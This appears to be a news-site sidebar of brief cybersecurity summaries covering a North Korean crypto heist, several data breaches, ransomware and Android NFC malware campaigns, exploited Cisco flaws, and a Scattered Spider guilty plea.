More from Cybersecurity & Privacy

• 
  North Korea’s $300M Crypto Heist Exposed

  A massive cryptocurrency theft of nearly $300 million targeted the KelpDAO vault this weekend, marking the largest crypto heist of 2026. Authorities and cybersecurity experts point to North Korea's notorious Lazarus Group as the likely culprit, continuing the regime's pattern of funding nuclear ambitions through cybercrime. The breach exploited two blockchain servers hosted by LayerZero, but officials assure no further contagion across other DeFi platforms. This incident raises fresh concerns about security in decentralized finance and the growing threat posed by state-backed hackers.

• 
  Massive Data Breach Hits France Titres

  France Titres, the French government agency responsible for issuing official identity documents, confirmed a data breach last week after a hacker group claimed to have stolen up to 19 million records. The compromised data includes names, birth dates, email addresses, and postal information, potentially exposing citizens to phishing attacks. While unauthorized portal access is not possible with the leaked data, the agency urges vigilance against suspicious communications. Investigations continue, with authorities involved and notifications underway for affected individuals.

• 
  Vercel Breach Reveals OAuth Blind Spot

  Vercel confirmed a serious security breach stemming from a compromised OAuth token linked to an AI tool vendor, Context.ai. Attackers exploited broad OAuth permissions granted by a Vercel employee, gaining access to internal systems and environment variables not marked as sensitive. This incident highlights a critical gap in OAuth oversight and environment variable classification that allowed attackers to escalate privileges undetected. Moving forward, Vercel has tightened defaults and is collaborating with partners like GitHub and Microsoft to prevent future attacks.

• 
  SystemBC Proxy Uncovers 1,570+ Ransomware Victims

  Security researchers at Check Point have uncovered over 1,570 victims linked to the Gentlemen ransomware operation through the SystemBC proxy malware's command-and-control server. This discovery reveals the vast scale and sophistication of the group, which targets multiple platforms including Windows, Linux, and NAS systems. The Gentlemen gang uses advanced tactics like disabling defenses and leveraging Group Policy Objects for domain-wide attacks. As the ransomware ecosystem evolves rapidly, this finding underscores the urgent need for enhanced cybersecurity measures worldwide.

• 
  CISA Flags Critical SD-WAN Flaws Exploited

  The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urgently ordered federal agencies to patch three critical vulnerabilities in Cisco's Catalyst SD-WAN Manager by April 24. These flaws, including CVE-2026-20133, have been actively exploited to access sensitive system information, posing serious risks to network security. Cisco patched these issues in February, but attacks continue, prompting CISA to add them to its Known Exploited Vulnerabilities Catalog. Agencies must follow CISA's emergency directives immediately to prevent further breaches.

• 
  22 Flaws Threaten Industrial Serial Converters

  Security researchers have uncovered 22 vulnerabilities in popular Lantronix and Silex serial-to-IP converters, exposing nearly 20,000 devices worldwide to potential takeover and data tampering. These flaws, dubbed BRIDGE:BREAK, enable attackers to hijack critical industrial communication links, risking disruption of legacy systems connected over IP networks. Both vendors have issued patches, but experts warn that network segmentation and strong credentials are essential to prevent exploitation. The discovery underscores growing cybersecurity risks in industrial control environments as legacy gear connects to modern networks.

• 
  Senior Scattered Spider Hacker Pleads Guilty

  Tyler Robert Buchanan, a 24-year-old senior member of the notorious cybercrime group Scattered Spider, has pleaded guilty to wire fraud conspiracy and aggravated identity theft. His role in 2022 SMS phishing attacks led to breaches at major tech firms like Twilio and LastPass, resulting in over $8 million stolen in cryptocurrency. Buchanan, now in U.S. custody, faces up to 22 years in prison with sentencing set for August 2026. This plea marks a significant step in dismantling the group, with other members still awaiting trial.

• 
  Credential Theft: The Silent Cyber Threat

  Despite the cybersecurity industry's focus on complex threats like zero-days and AI exploits, stolen credentials remain the easiest and most common way attackers breach systems. Identity-based attacks allow hackers to bypass defenses simply by using valid usernames and passwords, making detection difficult. With AI accelerating these attacks, incident response teams must adopt dynamic, iterative strategies like DAIR to keep pace. Training and communication are now critical to defending against these stealthy intrusions.

• 
  NGate Malware Hits Brazil's NFC Payments

  A new NGate Android malware campaign is targeting Brazilian users by trojanizing the HandyPay NFC payment app to steal card data and PINs. The malicious app tricks victims into setting it as the default payment tool, then captures NFC card info and PINs to enable unauthorized ATM withdrawals and payments. This campaign, active since November 2025, exploits fake lottery websites and counterfeit Google Play pages to distribute the malware. Security experts warn this marks a rise in NFC fraud, urging users to avoid unofficial app sources and disable NFC when not in use.